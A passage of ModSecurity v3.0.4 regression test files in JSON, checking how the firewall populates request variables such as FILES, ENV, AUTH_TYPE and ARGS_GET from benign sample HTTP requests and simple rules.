"request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Recife\" \\(Variable: GEO:CITY\\)" }, "rules":[ "SecRuleEngine On", "SecGeoLookupDb test-cases\/data\/GeoIP2-City-Test.mmdb", "SecRule REMOTE_ADDR \"@geoLookup\" \"id:1,pass,t:trim\"", "SecRule GEO \"@contains test \" \"id:2,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json0000644000175000017500000000345113607066010027412 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FULL_REQUEST_LENGTH (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"690\" \\(Variable: FULL_REQUEST_LENGTH\\)" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule FULL_REQUEST_LENGTH \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-FULL_REQUEST.json0000644000175000017500000000344113607066010026350 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FULL_REQUEST (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Multipart: Boundary: --------------------------756b6d74fa1a8ee2" }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule FULL_REQUEST \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-FILES_SIZES.json0000644000175000017500000000336013607066010026215 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FILES_NAMES (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"38\" \\(Variable: FILES_SIZES:filedata\\)" }, "rules":[ "SecRuleEngine On", "SecRule FILES_SIZES \"@gt 70.000000\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-FILES_NAMES.json0000644000175000017500000000333013607066010026160 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FILES_NAMES (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"T \\(0\\) t:trim: \"filedata" }, "rules":[ "SecRuleEngine On", "SecRule FILES_NAMES \"@contains filedata\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-FILES_COMBINED_SIZE.json0000644000175000017500000000336013607066010027332 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FILES_NAMES (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"70\" \\(Variable: FILES_COMBINED_SIZE\\)" }, "rules":[ "SecRuleEngine On", "SecRule FILES_COMBINED_SIZE \"@gt 70\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-FILES.json0000644000175000017500000000333613607066010025243 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FILES (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"T \\(0\\) t:trim: \"small_text_file" }, "rules":[ "SecRuleEngine On", "SecRule FILES \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ENV.json0000644000175000017500000000773713607066010025042 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ENV (1/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Variable: ENV:PATH" }, "rules":[ "SecRuleEngine On", "SecRule ENV:PATH \"@contains test\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ENV (2/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"regression tests\" .Variable: ENV:MODSECURITY." }, "rules":[ "SecRuleEngine On", "SecRule ENV:MODSECURITY \"@contains test\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ENV (3/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"bar\" .Variable: ENV:modfoo." }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@contains value\" \"id:1,phase:3,pass,t:trim,setenv:modfoo=bar\"", "SecRule ENV:modfoo \"@contains test\" \"id:2,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ENV (4/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Variable: ENV:PATH" }, "rules":[ "SecRuleEngine On", "SecRule ENV \"@contains test\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-DURATION.json0000644000175000017500000000226513607066010025626 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: AUTH_TYPE", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"[0-9\\.]+\"" }, "rules":[ "SecRuleEngine On", "SecRule DURATION \"@contains test \" \"id:1,phase:3,pass,t:trim\"", "SecRule DURATION \"@contains test \" \"id:2,phase:3,pass,t:trim\"", "SecRule DURATION \"@contains test \" \"id:3,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-AUTH_TYPE.json0000644000175000017500000000406413607066010026002 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: AUTH_TYPE", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Basic\"" }, "rules":[ "SecRuleEngine On", "SecRule AUTH_TYPE \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: AUTH_TYPE", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "AuThOrIzAtIoN": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"Basic\"" }, "rules":[ "SecRuleEngine On", "SecRule AUTH_TYPE \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS_POST_NAMES.json0000644000175000017500000000373413607066010026727 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_POST_NAMES (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"param1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_POST_NAMES \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_POST_NAMES (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"param2\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_POST_NAMES \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS_POST.json0000644000175000017500000000565313607066010026006 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_POST (1/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_POST \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_POST (2/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value2\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_POST \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_POST (3/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=¶m3=value3" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_POST:param2 \"0\" \"id:1,phase:2,pass,t:none,t:length\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS_NAMES.json0000644000175000017500000000727213607066010026063 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_NAMES - GET (1/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key1=value&key2=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"key1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_NAMES - GET (2/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key1=value&key2=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"key2\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_NAMES - POST (3/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"param1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_NAMES - POST (4/4)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"param2\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS_GET_NAMES.json0000644000175000017500000000335413607066010026557 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET_NAMES (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key1=value&key2=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"key1\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET_NAMES (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key1=value&key2=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"key2\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET_NAMES \"@contains test \" \"id:1,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS_GET.json0000644000175000017500000001053313607066010025631 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET (1/5)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"other_value\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET (2/5)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"value\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET (3/5)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value%26withsomestuff=tootherstuff", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"other_value&withsomestuff=tootherstuff\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET \"@contains test \" \"id:1,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET (4/5)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&secondkey=&key3=val3", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET:secondkey \"0\" \"id:1,phase:2,pass,t:none,t:length\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_GET (5/5)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&secondkey=othervalue&", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"othervalue\"" }, "rules":[ "SecRuleEngine On", "SecRule ARGS_GET \"@rx ^othervalue$ \" \"id:1,pass,t:none\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json0000644000175000017500000001511413607066010027224 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - GET (1/7)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"22." }, "rules":[ "SecRuleEngine On", "SecRule ARGS_COMBINED_SIZE \"@gt 10 \" \"id:1,pass\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: ARGS_COMBINED_SIZE - GET (2/7)", 